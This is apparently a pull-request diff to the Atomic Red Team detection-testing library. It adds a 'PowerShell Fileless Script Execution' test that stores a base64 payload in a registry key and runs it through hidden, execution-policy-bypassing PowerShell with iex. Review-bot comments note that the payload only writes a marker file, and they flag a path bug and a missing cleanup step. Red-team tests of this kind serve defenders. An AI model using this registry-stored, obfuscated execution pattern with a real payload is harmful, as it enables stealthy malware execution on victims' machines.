diff --git a/atomics/T1086/T1086.md b/atomics/T1086/T1086.md index 48851a65..2202125a 100644 --- a/atomics/T1086/T1086.md +++ b/atomics/T1086/T1086.md @@ -42,6 +42,8 @@ Remote Support: Yes - [Atomic Test #10 - Powershell Invoke-DownloadCradle](#atomic-test-10---powershell-invoke-downloadcradle) +- [Atomic Test #11 - PowerShell Fileless Script Execution](#atomic-test-11---powershell-fileless-script-execution) +
@@ -223,3 +225,17 @@ Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
+
+ +## Atomic Test #11 - PowerShell Fileless Script Execution +Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. + +**Supported Platforms:** Windows + + +#### Run it with `command_prompt`! +``` +reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggJyVTeXN0ZW1Sb290JS9UZW1wL2FydC1tYXJrZXIudHh0JyAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" +powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART))) +``` +
diff --git a/atomics/index.md b/atomics/index.md index 5912a86e..d5601c1a 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -488,6 +488,7 @@ - Atomic Test #8: Powershell XML requests [windows] - Atomic Test #9: Powershell invoke mshta.exe download [windows] - Atomic Test #10: Powershell Invoke-DownloadCradle [windows] + - Atomic Test #11: PowerShell Fileless Script Execution [windows] - [T1121 Regsvcs/Regasm](./T1121/T1121.md) - Atomic Test #1: Regasm Uninstall Method Call Test [windows] - Atomic Test #2: Regsvs Uninstall Method Call Test [windows] diff --git a/atomics/windows-index.md b/atomics/windows-index.md index 2953ffd3..de159f00 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md @@ -398,6 +398,7 @@ - Atomic Test #8: Powershell XML requests [windows] - Atomic Test #9: Powershell invoke mshta.exe download [windows] - Atomic Test #10: Powershell Invoke-DownloadCradle [windows] + - Atomic Test #11: PowerShell Fileless Script Execution [windows] - [T1121 Regsvcs/Regasm](./T1121/T1121.md) - Atomic Test #1: Regasm Uninstall Method Call Test [windows] - Atomic Test #2: Regsvs Uninstall Method Call Test [windows]
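Review bot: in the first T1086.md hunk (@@ -42,6 +42,8 @@) the new table-of-contents entry is followed by a second added `+` line that is empty, so the list now ends with two blank lines instead of one; drop the stray blank line so the spacing matches the existing entries above it.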
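Review bot: in the second T1086.md hunk (@@ -223,3 +225,17 @@) the base64 value written by `reg.exe add` decodes to `Set-Content -path '%SystemRoot%/Temp/art-marker.txt' -value "Hello from the Atomic Red Team"`, and PowerShell does not expand `%SystemRoot%` inside a single-quoted string, so when `iex` runs the decoded text Set-Content looks for a literal directory named `%SystemRoot%` and fails; use `$env:SystemRoot` (for example `"$env:SystemRoot\Temp\art-marker.txt"`) and re-encode the payload. Two further points for the same section: add the decoded command to the test description so a reader can see what `iex` executes without decoding the blob, and add a cleanup step, because the test leaves the `HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam` value and the marker file behind (e.g. `reg.exe delete "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /f` and removing `art-marker.txt`).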
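Review bot: the index.md hunk (@@ -488,6 +488,7 @@) adds the Atomic Test #11 entry by hand, and this diff touches only the rendered markdown files (T1086.md, index.md, windows-index.md) with no accompanying change to a source definition for T1086; if these index files and the technique page are generated from a source file, that source should carry the new test as well so the next regeneration does not drop it, and the entry title here should stay identical to the heading used in T1086.md (it currently does).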